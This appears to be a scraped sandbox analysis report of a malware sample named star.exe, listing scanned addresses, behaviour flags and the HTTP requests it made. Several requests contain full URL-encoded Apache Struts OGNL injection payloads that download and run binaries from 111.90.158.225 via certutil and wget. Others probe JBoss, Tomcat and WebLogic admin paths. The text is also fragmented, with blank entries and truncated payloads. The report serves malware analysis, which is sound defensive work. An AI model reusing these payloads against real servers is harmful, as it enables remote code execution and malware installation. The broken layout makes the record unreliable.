- IP: 192.168.0.0:8686 - IP: 192.168.0.170:445 - IP: 192.168.0.169:445 - IP: 192.168.0.11:445 - IP: 192.168.0.83:445 - IP: 192.168.0.0:10243 - IP: 192.168.0.0:33550 - IP: 183.91.67.0:8880 (Indonesia) - IP: 192.168.0.73:445 - IP: 183.91.67.0:8139 (Indonesia) - IP: 192.168.0.6:445 - IP: 192.168.0.0:9981 - IP: 192.168.0.165:445 - IP: 183.91.67.0:7415 (Indonesia) - IP: 192.168.0.63:445 - IP: 192.168.0.0:1400 - IP: 192.168.0.151:445 - IP: 183.91.67.0:8101 (Indonesia) - IP: 183.91.67.0:3128 (Indonesia) - IP: 192.168.0.46:445 - IP: 192.168.0.111:445 - IP: 192.168.0.0:8020 - IP: 192.168.0.0:4567 - IP: 192.168.0.0:8140 - IP: 192.168.0.77:445 - IP: 192.168.0.45:445 - IP: 183.91.67.0:5269 (Indonesia) - IP: 183.91.67.0:113 (Indonesia) - IP: 192.168.0.0:2375 - IP: 183.91.67.0:7001 (Indonesia) - IP: 183.91.67.0:5985 (Indonesia) - IP: 183.91.67.0:3689 (Indonesia) - IP: 192.168.0.0:7001 - IP: 183.91.67.0:8040 (Indonesia) - IP: 183.91.67.0:9100 (Indonesia) - IP: 192.168.0.40:445 - IP: 183.91.67.0:5357 (Indonesia) - IP: 192.168.0.16:445 - IP: 192.168.0.3:445 - IP: 183.91.67.0:8883 (Indonesia) - IP: 192.168.0.0:2404 - IP: 192.168.0.0:49153 - IP: 183.91.67.0:8889 (Indonesia) - IP: 183.91.67.0:8888 (Indonesia) - IP: 183.91.67.0:1471 (Indonesia) - IP: 192.168.0.0:2376 - IP: 192.168.0.161:445 - IP: 183.91.67.0:4444 (Indonesia) - IP: 183.91.67.0:4443 (Indonesia) - IP: 192.168.0.0:49152

Possible date expiration check, exits too soon after checking local time

- process: star.exe, PID 5560

Creates RWX memory

SetUnhandledExceptionFilter detected (possible anti-debug)

62 HTTP Request(s) detected

Date: 2020-02-15 01:57:34


http://192.168.0.0/

Hostname: 192.168.0.0

IP Address:

Port: 80

Count: 1

http://192.168.0.0/

Hostname: 192.168.0.0

IP Address:

Port: 80

Count: 1

http://192.168.0.0/

Hostname: 192.168.0.0

IP Address:

Port: 80

Count: 1

http://192.168.0.0/

Hostname: 192.168.0.0

IP Address:

Port: 80

Count: 1

http://192.168.0.0/

Hostname: 192.168.0.0

IP Address:

Port: 80

Count: 1

http://192.168.0.0/ws_utc/resources/setting/options/general

Hostname: 192.168.0.0

IP Address:

Port: 80

Count: 1

http://192.168.0.0/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCES

Date: 2020-02-15 01:57:34


S%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3

D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23o

u%3D%23cr.getInstance%[email protected]@class%29%29.%28

%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasse

s%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D

%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getW

riter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]

ng.Runtime@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20htt

p://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.get

InputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action

Hostname: 192.168.0.0

IP Address:

Port: 80

Count: 1

http://192.168.0.0/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEM

BER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatc

her.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]

mmons.io.IOUtils@toString%[email protected]@getRuntime%28%29.exec%28%27certuti

l.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe

%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%2

8%29%29%7D/index.action

Hostname: 192.168.0.0

IP Address:

Port: 80

Count: 1







Date: 2020-02-15 01:57:34




ng.Runtime@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3

E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90

.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%

20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20

&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/

index.action

Hostname: 192.168.0.0

IP Address:

Port: 80

Count: 1




mmons.io.IOUtils@toString%[email protected]@getRuntime%28%29.exec%28%27uname

%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%


&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64

%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%2

9%29.%28%23w.close%28%29%29%7D/index.action

Hostname: 192.168.0.0

IP Address:

Port: 80

Count: 1

http://192.168.0.0/invoker/readonly

Hostname: 192.168.0.0

IP Address:

Port: 80

Count: 1

http://192.168.0.0/invoker/JMXInvokerServlet

Date: 2020-02-15 01:57:34


Hostname: 192.168.0.0

IP Address:

Port: 80

Count: 1

http://192.168.0.0/jmx-console/HtmlAdaptor

Hostname: 192.168.0.0

IP Address:

Port: 80

Count: 1

http://192.168.0.0/orders.xhtml

Hostname: 192.168.0.0

IP Address:

Port: 80

Count: 1

http://192.168.0.0/users

Hostname: 192.168.0.0

IP Address:

Port: 80

Count: 1

http://192.168.0.0/dba_put.jsp/

Hostname: 192.168.0.0

IP Address:

Port: 80

Count: 1

http://192.168.0.0/dba_put.jsp

Hostname: 192.168.0.0

IP Address:

Port: 80

Count: 1

http://192.168.0.0/manager/html

Hostname: 192.168.0.0

Date: 2020-02-15 01:57:34


IP Address:

Port: 80

Count: 1

http://192.168.0.0/wls-wsat/CoordinatorPortType

Hostname: 192.168.0.0

IP Address:

Port: 80

Count: 1

http://192.168.0.0:113/

Hostname: 192.168.0.0:113

IP Address:

Port: 113

Count: 1

http://183.91.67.0/

Hostname: 183.91.67.0

IP Address:

Port: 80

Count: 1

http://183.91.67.0/

Hostname: 183.91.67.0

IP Address:

Port: 80

Count: 1

http://183.91.67.0/

Hostname: 183.91.67.0

IP Address:

Port: 80

Count: 1

http://183.91.67.0/

Hostname: 183.91.67.0

IP Address:

Date: 2020-02-15 01:57:34


Port: 80

Count: 1

http://183.91.67.0/

Hostname: 183.91.67.0

IP Address:

Port: 80

Count: 1


Hostname: 183.91.67.0

IP Address:

Port: 80

Count: 1












Hostname: 183.91.67.0

IP Address:

Port: 80

Count: 1





Date: 2020-02-15 01:57:34





Hostname: 183.91.67.0

IP Address:

Port: 80

Count: 1














index.action

Hostname: 183.91.67.0

IP Address:

Port: 80

Count: 1







Date: 2020-02-15 01:57:34





Hostname: 183.91.67.0

IP Address:

Port: 80

Count: 1


Hostname: 183.91.67.0

IP Address:

Port: 80

Count: 1


Hostname: 183.91.67.0

IP Address:

Port: 80

Count: 1


Hostname: 183.91.67.0

IP Address:

Port: 80

Count: 1


Hostname: 183.91.67.0

IP Address:

Port: 80

Count: 1

http://183.91.67.0/users

Hostname: 183.91.67.0

IP Address:

Port: 80

Count: 1

Date: 2020-02-15 01:57:34



Hostname: 183.91.67.0

IP Address:

Port: 80

Count: 1


Hostname: 183.91.67.0

IP Address:

Port: 80

Count: 1


Hostname: 183.91.67.0

IP Address:

Port: 80

Count: 1


Hostname: 183.91.67.0

IP Address:

Port: 80

Count: 1

http://183.91.67.0:113/

Hostname: 183.91.67.0:113

IP Address:

Port: 113

Count: 1

http://192.168.0.0:3389/

Hostname: 192.168.0.0:3389

IP Address:

Port: 3389

Count: 1

http://183.91.67.0:3389/

Date: 2020-02-15 01:57:34


Hostname: 183.91.67.0:3389

IP Address:

Port: 3389

Count: 1

http://192.168.0.1/

Hostname: 192.168.0.1

IP Address:

Port: 80

Count: 1

http://192.168.0.1/

Hostname: 192.168.0.1

IP Address:

Port: 80

Count: 1

http://192.168.0.1/

Hostname: 192.168.0.1

IP Address:

Port: 80

Count: 1

http://192.168.0.1/

Hostname: 192.168.0.1

IP Address:

Port: 80

Count: 1

http://192.168.0.1/

Hostname: 192.168.0.1

IP Address:

Port: 80

Count: 1


Hostname: 192.168.0.1

Date: 2020-02-15 01:57:34


IP Address:

Port: 80

Count: 1












Hostname: 192.168.0.1

IP Address:

Port: 80

Count: 1








Hostname: 192.168.0.1

IP Address:

Port: 80

Count: 1



Date: 2020-02-15 01:57:34













index.action

Hostname: 192.168.0.1

IP Address:

Port: 80

Count: 1










Hostname: 192.168.0.1

IP Address:

Port: 80

Count: 1


Hostname: 192.168.0.1

Date: 2020-02-15 01:57:34


IP Address:

Port: 80

Count: 1


Hostname: 192.168.0.1

IP Address:

Port: 80

Count: 1


Hostname: 192.168.0.1

IP Address:

Port: 80

Count: 1


Hostname: 192.168.0.1

IP Address:

Port: 80

Count: 1

http://192.168.0.1/users

Hostname: 192.168.0.1

IP Address:

Port: 80

Count: 1


Hostname: 192.168.0.1

IP Address:

Port: 80

Count: 1


Hostname: 192.168.0.1

IP Address:

Date: 2020-02-15 01:57:34


Port: 80

Count: 1


Hostname: 192.168.0.1

IP Address:

Port: 80

Count: 1


Hostname: 192.168.0.1

IP Address:

Port: 80

Count: 1

http://192.168.0.1:113/

Hostname: 192.168.0.1:113

IP Address:

Port: 113

Count: 1

1 Host(s) detected

IP Address Hostname Reverse DNS

183.91.67.0

1 Countr(y|ies) detected

Hosts Country

1 Indonesia

Date: 2020-02-15 01:57:34

infosec binary analisys conn · infosec binary analisys shell32.dll ole32.dll ws2_32.dll user32.dll...

Documents